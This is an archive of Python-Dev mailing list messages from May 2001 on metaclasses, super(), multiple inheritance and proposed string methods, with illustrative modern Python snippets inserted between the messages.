From mal at lemburg.com  Thu May  3 18:08:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 18:08:30 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>  
	            <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com>
Message-ID: <3AF1827E.E730F5DE@lemburg.com>

Guido van Rossum wrote:
> 
> > We are actually trying to turn classes into types here :-)
> 
> Yes!  Wait till you see my next batch of checkins. :-)

Looking forward to them :) 

BTW, can you give a good starting point into all this (code wise
and concept wise) ? I'd like to play around these new concepts
a little to get a better feeling for the possible issues (I should
have done the same for the coercion stuff a year ago: implementing
mxNumber I now find that some important hooks are missing :-().
 
> > Really, I think that we could resolve this issue by not inheriting
> > from meta-classes. DictType is a creation of the meta-class
> > TypeType. I'm not calling these instances to prevent additional
> > confusion. The root of the problem is that for some reason there
> > is belief that DictType should implicitly inherit attributes and
> > methods from TypeType. If we simply say that there is no implicit
> > inheritance (only explicit one), then these problems should go
> > away.
> 
> Sorry, you still seem to be confused about this. 

I think it has to do with terminology: when I say "inherit"
I actually mean "the lookup is forwarded to another object".

In that sense, instances inherit from their classes and 
classes from their base-classes:

meta-class M ->        o base-class A
                         o class B
                           o instance x = B()  

Meta-class M controls this "inheritance scheme" and can modify
it depending on its needs. 

Here's a scenario of what I have in mind:

In the above picture, say A defines an attribute A.a which is not 
defined in B or as instance attribute of B(). Querying x.a would then 
launch this process:

1. x.a -> fails
2. M.__findattr__(x, 'a') is called to find and return the
   attribute
3. M.__findattr__ asks B for an attribute 'a' -> fails
4.    -- " --     asks A       -- " --        -> success
5.    -- " --     returns the found attribute
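A minimal sketch of that forwarding chain in present-day Python. It assumes a hypothetical findattr() function standing in for the proposed M.__findattr__ hook (no such hook exists), and it walks the bases depth-first, left to right, the way classic classes did. It returns raw class attributes and does not bind methods.

```python
def findattr(obj, name):
    """Hypothetical stand-in for the proposed M.__findattr__ hook."""
    # Look in the instance itself first.
    if name in vars(obj):
        return vars(obj)[name]

    def search(cls):
        # Forward the lookup to the class, then to each base class in turn.
        if name in vars(cls):
            return True, vars(cls)[name]
        for base in cls.__bases__:
            found, value = search(base)
            if found:
                return True, value
        return False, None

    found, value = search(type(obj))
    if found:
        return value          # step 5: return the found attribute
    raise AttributeError(name)


class A:
    a = "from A"

class B(A):
    pass

x = B()
print(findattr(x, "a"))  # from A
```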

I know that this is somewhat different under the covers than
what's happening now, but the Python programmer will not notice
this. It most probably does not work well with the Don Beaudry
hook though... so maybe I'm simply on the wrong track here.

> As I tried to
> explain before, DictType does not *inherit* from TypeType, but it is
> an *instance* of TypeType.  TypeType defines a __repr__() method for
> all its instances.  This is needed so that repr(DictType) returns
> "<type 'DictType'>".  It is *not* inherited from TypeType!
> 
> If DictType were to inherit from something, it would inherit from the
> (not yet existing) ObjectType.  ObjectType would have a __repr__
> method too: it returns "<foo object at 0x......>".
> 
> But this method is overridden by DictType, so doesn't come into play.
> 
> Requiring explicit inheritance (whatever that may be) won't fix the
> problem.
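In today's Python, where types and classes were eventually unified, this distinction can be checked directly. A __repr__ defined on the metaclass governs repr() of the class object, and a __repr__ defined on the class governs repr() of its instances. Meta and Dict are illustrative names.

```python
class Meta(type):
    # Defined on the metaclass: used when the *class itself* is repr()'d.
    def __repr__(cls):
        return "<class made by Meta: %s>" % cls.__name__

class Dict(metaclass=Meta):
    # Defined on the class: used when an *instance* is repr()'d.
    def __repr__(self):
        return "<a Dict instance>"

print(repr(Dict))    # <class made by Meta: Dict>
print(repr(Dict()))  # <a Dict instance>

# dict is an *instance* of type, but type is not among dict's bases.
print(type(dict) is type, type in dict.__mro__)  # True False
```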

With "explicit inheritance" I meant that the programmer has to
take care of passing the lookup on to the meta-class, rather
than applying some magic which hooks together class and meta-
class.
 
> > Some of these ideas are buried in the "super" part of this
> > thread. Unfortunately this concept doesn't go very far since
> > Python has multiple inheritance and thus the term "super"
> > (referring to the class' single base class) is not well-defined.
> 
> Not true.  While super can't always refer to a single class, the use
> of super can be completely well-defined in an unambiguous way.  Given
> 
>   class D(A, B, C):
>     def foo(self):
>       super.foo(self)
> 
> "super.foo" is whatever would be called in D1 if we changed the class
> hierarchy as follows:
> 
>   class D1(A, B, C): pass
>   class D(D1):
>     def foo(self):
>       D1.foo(self)
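A runnable check of this definition, using the built-in super() that later Python versions provide (the class bodies are illustrative). Both spellings continue the lookup after D in the same order, so they reach the same method.

```python
class A:
    def foo(self):
        return "A.foo"

class B:
    def foo(self):
        return "B.foo"

class C:
    def foo(self):
        return "C.foo"

class D(A, B, C):
    def foo(self):
        # Built-in super(): continue the lookup after D in D's MRO.
        return super().foo()

class D1(A, B, C):
    pass

class DExplicit(D1):
    def foo(self):
        # The rewrite above: name the intermediate class explicitly.
        return D1.foo(self)

print(D().foo(), DExplicit().foo())  # A.foo A.foo
```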

Nice trick -- much like the "+0" trick in math ;-)

> The problem with super is not that it isn't well-defined.  Its problem
> is that it's not enough to do what you want.  In some situations
> involving multiple inheritance, it can be essential to be able to
> "merge" methods of the same name defined in each of the base classes,
> e.g.
> 
>   class C(A, B):
>     def save(self):
>       A.save(self)
>       B.save(self)
> 
> So we can't use super as an argument to abandon explicitly naming the
> base class of base methods.  Out of the proposed spellings that I can
> remember:
> 
>       B.save(self)                      # current Python
>       B.__dict__['save'](self)          # ditto, butt ugly
>       B::save(self)                     # C++
>       B._.save(self)                    # Don Beaudry
>       B.instanceMethods.save(self)      # ???
> 
> I still like current Python best!
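A runnable version of the save() example, with a module-level log list as an illustrative stand-in for real saving. It shows why a single super call is not enough here: unless every base class passes the call along, super() reaches only the first implementation in the MRO.

```python
log = []

class A:
    def save(self):
        log.append("A")

class B:
    def save(self):
        log.append("B")

class C(A, B):
    def save(self):
        # Explicitly merge both base implementations.
        A.save(self)
        B.save(self)

C().save()
print(log)  # ['A', 'B']

class CSuper(A, B):
    def save(self):
        # Reaches only A.save, because A.save does not pass the call on.
        super().save()

log.clear()
CSuper().save()
print(log)  # ['A']
```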

But it doesn't help us in the very common case of mixin classes,
since there neither the method nor, sometimes, even the programmer
knows where the base method to call lives. This is why I
wrote the basemethod() helper: it looks up the right method
at run-time and thus allows writing mixin-classes which override
methods of other classes which are only known to the programmer
using the mixin and not necessarily to the one writing the mixin.
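For comparison, present-day Python handles this case with super(), which resolves the next method from the MRO of the final class at run time. This is not MAL's basemethod() helper, whose code is not shown here. LoggingMixin, Store and LoggingStore are illustrative names.

```python
class LoggingMixin:
    # The mixin author does not know which class will supply save().
    def save(self):
        self.events.append("logged")
        return super().save()  # resolved via type(self).__mro__ at run time

class Store:
    def __init__(self):
        self.events = []

    def save(self):
        self.events.append("stored")
        return "ok"

class LoggingStore(LoggingMixin, Store):
    pass

s = LoggingStore()
print(s.save(), s.events)  # ok ['logged', 'stored']
```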
 
> > As Jim mentioned in his reply to Thomas' question, SmallTalk
> > has two parallel hierarchies. One for the classes and one for
> > the meta-classes. If we follow the same path in Python and
> > keep the two well separated, I think we can resolve many of
> > the issues which are currently showing up.
> 
> Yeah, but this is not the path that Python has already taken (and
> which has been beaten further by Jim Fulton's ExtensionClasses).
> Python's path is "turtles all the way down".  See also my old
> head-exploding metaclasses paper.

I know... I was under the impression, though, that a little
breakage under the covers is allowed when moving from type/classes
to all types.
 
> > To link the two hierarchies together we don't need a "super"
> > concept, but instead a way to reach the meta-class in charge
> > of a class, say "klass.__creator__".
> 
> Your confusion between the "isInstanceOf" and "isInheritedFrom"
> relationships seems really deep!  Super relates to inheritance.
> Metaclasses relate to instantiation (of the class, as an instance of
> the metaclass).

See above... I don't like implicitly binding creation of objects
with lookup paths. These two concepts don't belong together, IMHO,
since they introduce restrictions which are not really necessary.
(I have had some great experiences with loosely coupled object
systems and don't want to miss their flexibility anymore.)

> > Note that there's another issue hiding in all this and again
> > this is due to multiple inheritance: which meta-class is in
> > charge of a class which is derived from two classes having
> > different meta-classes ?
> >
> > meta1            -->         o klass1
> >                                o klass1a
> >                                o klass1b
> > meta2            -->         o klass2
> >                                o klass2a
> >                                o klass2b
> >
> > class klass3(klass1a, klass2b):
> >       ...
> >
> > I think there's no clean way to resolve this, so I'd suggest
> > to simply rule this out and declare it illegal (class can
> > only be based on classes having the same meta-class).
> 
> Unfortunately, again thanks to Jim Fulton, we can't rule this out,
> because this is actually used by ExtensionClasses.  The rule (as I
> interpret it) gives the first base class control; if the first base
> class is a standard class, it looks if any of the other base classes
> are not standard classes, and if so, gives control to the first such
> base class.  Another way to say this is that the first base class that
> has a non-standard metaclass gets control.
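For reference, present-day Python settles this differently from both proposals. The most derived metaclass among the bases wins, and unrelated metaclasses are rejected with a TypeError unless a common subclass is supplied. The class names mirror the diagram above and are illustrative.

```python
class Meta1(type):
    pass

class Meta2(type):
    pass

class Klass1a(metaclass=Meta1):
    pass

class Klass2b(metaclass=Meta2):
    pass

conflict_rejected = False
try:
    class Klass3(Klass1a, Klass2b):
        pass
except TypeError:
    # Neither Meta1 nor Meta2 is a subclass of the other.
    conflict_rejected = True

# Deriving a common metaclass resolves the conflict explicitly.
class Meta3(Meta1, Meta2):
    pass

class Klass3(Klass1a, Klass2b, metaclass=Meta3):
    pass

print(conflict_rejected, type(Klass3).__name__)  # True Meta3
```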

Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't
it be possible to adapt ExtensionClass to an altered scheme ?

> (ExtensionClasses implements an additional rule where it requires all
> except one of the base classes to define no instance variables.  This
> is an example of the importance of metaclasses done right: the
> metaclass has control over such issues.  I don't think that
> Smalltalk's metaclasses have this much control -- you pretty much have
> a 1-1 correspondence between class and metaclass.

Right: more power to the meta-class :-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From paul at pfdubois.com  Thu May  3 18:24:40 2001
From: paul at pfdubois.com (Paul F. Dubois)
Date: Thu, 3 May 2001 09:24:40 -0700
Subject: [Python-Dev] Multiple inheritance
Message-ID: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>

Pardon if this is brief and suggestive only, I am on deadlines.

Super is a mistaken concept in multiple inheritance languages. Fortunately,
Python is not brain-damaged. Its multiple inheritance model can be fixed
easily to be fully capable.

Here is a suggestive example of implementing the Eiffel model (the only one
that is theoretically sound) using "pretend" Python syntax (keyword
conservationists might like "import" where I have "rename"):


1. The simple case, X inherits from Y and in defining foo and bar needs to
use Y's version:

class X (Y rename foo as _sfoo,
                  bar as _sbar
        ):
    def foo (self):
        self._sfoo()
        myfoostuff

Suppose D inherits from B and C, which both inherit from A.
A has a method a1 that is redefined in B but not in C.
D wishes to use both A's version as inherited via C and B's version.

class D (B rename a1 as ba1, C rename a1 as ca1):

     can now use self.ca1, self.a1
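Without new syntax, the renaming can be approximated in current Python with class-level aliases. Unlike Eiffel's rename, this only adds names and does not hide the original a1. Here is a sketch of the diamond case above.

```python
class A:
    def a1(self):
        return "A.a1"

class B(A):
    def a1(self):  # redefined in B
        return "B.a1"

class C(A):
    pass  # inherits A.a1 unchanged

class D(B, C):
    # Emulate "B rename a1 as ba1, C rename a1 as ca1" with aliases.
    ba1 = B.a1
    ca1 = C.a1  # finds A.a1 through C

d = D()
print(d.ba1(), d.ca1(), d.a1())  # B.a1 A.a1 B.a1
```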

Renaming is also useful where you inherit from a utility class and the lingo
is different in the class where you want to use it. E.g. class Window (Tree
rename children as subWindows)

Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.


From donb at abinitio.com  Thu May  3 18:47:29 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Thu, 03 May 2001 12:47:29 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105031647.MAA25803@localhost.localdomain>

"Tim Peters" <tim.one at home.com> wrote,
> Given that we're using Python's search rules, the ambiguous point remaining
> is whether:
> 
>     super.f()
> 
> textually contained in a method of class K begins searching with:
> 
>     1) K.__bases__
> 
> or with:
> 
>     2) self.__class__.__bases__

It can only be 1.  Using 2 will only be correct if you are in a
method defined on a leaf class.  If not in a leaf, the search will
find the method you are already in... recursion is likely to terminate
in a stack overflow ;)
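A small demonstration of both rules, with each "super" call hand-written through __bases__ (all class names are illustrative). Option 2 works only while the defining class is the leaf. Once it is subclassed, the search finds the current method again and recurses until Python raises RecursionError.

```python
class K:
    def f(self):
        return ["K.f"]

class L(K):
    def f(self):
        # Option 1: start at L.__bases__ (the class containing the code).
        return ["L.f"] + L.__bases__[0].f(self)

class BadL(K):
    def f(self):
        # Option 2: start at self.__class__.__bases__ (the runtime class).
        return ["BadL.f"] + self.__class__.__bases__[0].f(self)

class M(BadL):
    pass

print(L().f())     # ['L.f', 'K.f']
print(BadL().f())  # ['BadL.f', 'K.f'] (BadL is the leaf here)

recursed = False
try:
    M().f()  # self.__class__ is M, so the "base" found is BadL itself
except RecursionError:
    recursed = True
print(recursed)    # True
```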

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido at digicool.com  Thu May  3 20:48:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:48:19 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
             <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com>


From guido at digicool.com  Thu May  3 20:50:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:50:30 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
             <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com>

> Pardon if this is brief and suggestive only, I am on deadlines.

No problem.  We appreciate it!

> Super is a mistaken concept in multiple inheritance languages. Fortunately,
> Python is not brain-damaged. Its multiple inheritance model can be fixed
> easily to be fully capable.
> 
> Here is a suggestive example of implementing the Eiffel model (the only one
> that is theoretically sound) using "pretend" Python syntax (keyword
> conservationists might like "import" where I have "rename"):
> 
> 
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):
>     def foo (self):
>         self._sfoo()
>         myfoostuff

Nice!  This is similar to Jeremy's favorite way of spelling "super":

class X(Y):
    Yfoo = Y.foo
    def foo(self):
        self.Yfoo()
        myfoostuff

> Suppose D inherits from B and C, which both inherit from A.
> A has a method a1 that is redefined in B but not in C.
> D wishes to use both A's version as inherited via C and B's version.
> 
> class D (B rename a1 as ba1, C rename a1 as ca1):
> 
>      can now use self.ca1, self.a1
> 
> Renaming is also useful where you inherit from a utility class and the lingo
> is different in the class where you want to use it. E.g. class Window (Tree
> rename children as subWindows)
> 
> Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.

Yes.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jepler at inetnebr.com  Thu May  3 20:17:16 2001
From: jepler at inetnebr.com (Jeff Epler)
Date: Thu, 3 May 2001 13:17:16 -0500
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010503131714.D21814@inetnebr.com>

On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Why not let us spell this as:
	class X(Y):
		from Y import foo as _sfoo, bar as _sbar
		...

Of course, then you can spell inheritance as
	class X:
		from Y import *
Right?  :)

Jeff


From nas at python.ca  Thu May  3 21:05:37 2001
From: nas at python.ca (Neil Schemenauer)
Date: Thu, 3 May 2001 12:05:37 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com>
Message-ID: <20010503120537.A13708@glacier.fnational.com>

Jeff Epler wrote:
> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):
> 
> Why not let us spell this as:
> 	class X(Y):
> 		from Y import foo as _sfoo, bar as _sbar
> 		...

This already has a meaning in Python.  Paul's suggested syntax is
pretty neat, IMHO.

  Neil


From trentm at ActiveState.com  Thu May  3 21:39:27 2001
From: trentm at ActiveState.com (Trent Mick)
Date: Thu, 3 May 2001 12:39:27 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com>
Message-ID: <20010503123927.B30837@ActiveState.com>

On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote:
> Jeff Epler wrote:
> > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > > class X (Y rename foo as _sfoo,
> > >                   bar as _sbar
> > >         ):
> > 
> > Why not let us spell this as:
> > 	class X(Y):
> > 		from Y import foo as _sfoo, bar as _sbar
> > 		...
> 
> This already has a meaning in Python.  Paul's suggested syntax is
> pretty neat, IMHO.

Ditto, but how do you separate the "rename" lists for multiple inheritance?

    class X (Y rename foo as _sfoo, bar as _sbar; Z):
                                                ^---- what to use here
        pass

How about:

    class X(Y, Z):
        from Y inherit foo as _yfoo, bar as _ybar
        from Z inherit foo as _zfoo, bar as _zbar


Hmmmmm. Don't know if I like that either. Just throwing out ideas.

Trent

-- 
Trent Mick
TrentM at ActiveState.com


From greg at cosc.canterbury.ac.nz  Fri May  4 06:25:08 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:25:08 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF1827E.E730F5DE@lemburg.com>
Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> I think it has to do with terminology: when I say "inherit"
> I actually mean "the lookup is forwarded to another object".

Some OO languages munge together the instance and inheritance
relationships, but Python isn't one of them. Using terminology
that way in the context of Python is guaranteed to cause
massive confusion!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Fri May  4 06:58:20 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:58:20 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>
Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz>

pf at artcom-gmbh.de (Peter Funk):

> * People will confuse this with calling
> MyBaseClass.__getitem__(....)

Given type/class/instance unification, that's exactly how it'll
be implemented. So it's not confusion, it's insightful understanding!

> This '::' operator is not at all that ugly

Well, that's a matter of opinion. But I'll concede that it's
less ugly than something like @ or $.

But in any case, it's not going to mean quite the same thing
in Python as it does in C++, so it might just confuse C++
people.

What exactly *is* it going to mean in Python, anyway?
Will it have a corresponding __magic__ method, and if so,
what will it be called?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From mal at lemburg.com  Fri May  4 10:40:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 10:40:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF26AF1.780462E2@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > I think it has to do with terminology: when I say "inherit"
> > I actually mean "the lookup is forwarded to another object".
> 
> Some OO languages munge together the instance and inheritance
> relationships, but Python isn't one of them. Using terminology
> that way in the context of Python is guaranteed to cause
> massive confusion!

But that's exactly what I am trying to do here: separate the
notion of how lookups work (inheritance) from how objects are 
created (instantiation) !

In Python instantiation binds the new object to the creating
class and all failing lookups are directed from the object to
the class. 

OTOH, the class - base-class lookup relationship 
doesn't have anything to do with the creation of objects -- classes
are simply bound to their base-classes per definition of the
class in the sense that failing lookups are directed to the
base-classes.

Classes themselves are created by meta-classes. The lookup
strategy between the two is defined by the meta-class.

What I'm arguing for is that meta-classes should get complete
control over how lookups and object creation are done. However,
this will only be possible by breaking the current automatic
lookup scheme at the meta-class - class boundary since otherwise
you'd run into endless loops during lookups (e.g. for many of
the __xxx__ methods).
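For comparison, present-day Python already draws a boundary close to the one described. A failing lookup on a class falls back to its metaclass, but a failing lookup on an instance never reaches the metaclass. Meta and K are illustrative names.

```python
class Meta(type):
    greeting = "defined on the metaclass"

class K(metaclass=Meta):
    pass

# Class lookup: K's own MRO fails, so the metaclass is consulted.
print(K.greeting)                # defined on the metaclass

# Instance lookup: only type(instance).__mro__ (K, object) is searched.
print(hasattr(K(), "greeting"))  # False
```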

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May  4 11:04:08 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 11:04:08 +0200
Subject: [Python-Dev] "".tokenize() ?
Message-ID: <3AF27088.DE495210@lemburg.com>

Gustavo Niemeyer submitted a patch which adds a tokenize like
method to strings and Unicode:

"one, two and three".tokenize([",", "and"])
-> ["one", " two ", "three"]

I like this method -- should I review the code and then check it in ?

PS: Haven't gotten any response regarding the .decode() method yet...
should I take this as "no objections" ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Fri May  4 11:57:19 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 11:57:19 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff>

mal wrote:


> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1.  method bloat.  not exactly something you do every day, and
when you do, it's a one-liner:

import re
def tokenize(string, ignore):
    return [word for word in re.findall(r"\w+", string) if word not in ignore]

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

-0.  method bloat.  we don't have asfloat methods on integers and
asint methods on strings either...

Cheers /F


From mal at lemburg.com  Fri May  4 12:16:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 12:16:16 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff>
Message-ID: <3AF28170.399C2A5@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1.  method bloat.  not exactly something you do every day, and
> when you do, it's a one-liner:
> 
> def tokenize(string, ignore):
>     return [word for word in re.findall(r"\w+", string) if word not in ignore]

This is not the same as what .tokenize() does: it cuts at each
occurrence of a substring rather than at words as in your example
(although I must say that list comprehension looks cool ;-).
 
> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> -0.  method bloat.  we don't have asfloat methods on integers and
> asint methods on strings either...

Well, we already have .encode() which interfaces to PyString_Encode(),
but no Python API for getting at PyString_Decode(). This is what
.decode() is for. Depending on the codecs you use, these two
methods can be very useful, e.g. for "fixing" line-endings or
hexifying strings. The codec concept can be used for far more
applications than just converting from and to Unicode.
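In present-day Python 3 the methods ended up split by type. str.encode() and bytes.decode() accept text encodings only, and bytes-to-bytes codecs such as hexification are reached through codecs.encode() and codecs.decode(). Here is a small sketch using the standard "hex" codec.

```python
import codecs

data = b"Python-Dev"
hexed = codecs.encode(data, "hex")   # bytes-to-bytes codec
print(hexed)                         # b'507974686f6e2d446576'
print(codecs.decode(hexed, "hex"))   # b'Python-Dev'
```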

About rich method APIs in general: I like having rich method APIs,
since they make life easier (you don't have to reinvent the wheel 
everytime you want a common job to be done). IMHO, too many
methods can never hurt, but I'm probably alone with that POV.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Fri May  4 12:50:06 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 12:50:06 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com>
Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff>

mal wrote:

> > > "one, two and three".tokenize([",", "and"])
> > > -> ["one", " two ", "three"]
> > >
> > > I like this method -- should I review the code and then check it in ?
> >
> > -1.  method bloat.  not exactly something you do every day, and
> > when you do, it's a one-liner:
> >
> > def tokenize(string, ignore):
> >     return [word for word in re.findall(r"\w+", string) if word not in ignore]
>
> This is not the same as what .tokenize() does: it cuts at each
> occurrence of a substring rather than at words as in your example

oh, I didn't see the spaces.  splitting on all substrings is even
easier (but perhaps a bit more obscure, at least when written
on one line):

def tokenize(string, seps):
    return re.split("|".join(map(re.escape, seps)), string)
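Here is a self-contained version of the re.split() approach with a usage check. Each separator is escaped so that characters like "." or "|" match literally. Note that the pieces keep their surrounding spaces, so the last one comes back as ' three', not "three" as in the patch's example. Strip the pieces if that matters.

```python
import re

def tokenize(string, seps):
    # Build one alternation of the escaped separators and split on it.
    return re.split("|".join(map(re.escape, seps)), string)

pieces = tokenize("one, two and three", [",", "and"])
print(pieces)                       # ['one', ' two ', ' three']
print([p.strip() for p in pieces])  # ['one', 'two', 'three']
```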

Cheers /F


From lkcl at samba-tng.org  Fri May  4 13:31:29 2001
From: lkcl at samba-tng.org (Luke Kenneth Casson Leighton)
Date: Fri, 4 May 2001 13:31:29 +0200
Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn]
Message-ID: <20010504133129.K26116@angua.rince.de>

hi there,

i thought it best to bring this to someone's attention.

the forkingmixin code keeps track of its children, plus
because it forks, there's no close_request() to interfere
with the operation of the child etc. etc.

now, for some marginally bizarre reason, adding an
extra base class - BaseServer - has, i believe (without
proof, just a hunch), caused a bug in ThreadingMixIn to be
more likely to occur.

now, i wrote BaseServer in order to be able to overload
this for a server that reads from a SQL server table
and performs actions based on what it reads from there
(the name of a host and the name of a python script to
action on the host, from the database :) :)

... but i don't do threading.  python is my first
actual exposure to thread programming.  does anyone
have enough experience with threads to write something
in fewer lines and less time than this message?

all best,

luke

----- Forwarded message from noreply at sourceforge.net -----

Delivered-To: lkcl at angua.rince.de
Delivered-To: lkcl at samba.org
To: noreply at sourceforge.net
From: noreply at sourceforge.net
Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn
Date: Thu, 03 May 2001 16:26:12 -0700

Bugs item #417845, was updated on 2001-04-21 08:28
You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470

Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Submitted By: Nobody/Anonymous (nobody)
Assigned to: Guido van Rossum (gvanrossum)
Summary: Python 2.1: SocketServer.ThreadingMixIn

Initial Comment:
SocketServer.ThreadingMixIn does not work properly
since it tries to close the socket of a request two
times.


From gward at python.net  Fri May  4 20:12:44 2001
From: gward at python.net (Greg Ward)
Date: Fri, 4 May 2001 14:12:44 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010504141244.A1167@gerg.ca>

On 03 May 2001, Paul F. Dubois said:
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Maybe I'm being thick, but don't you get the same effect by doing this:

class X (Y):
    _sfoo = Y.foo
    _sbar = Y.bar

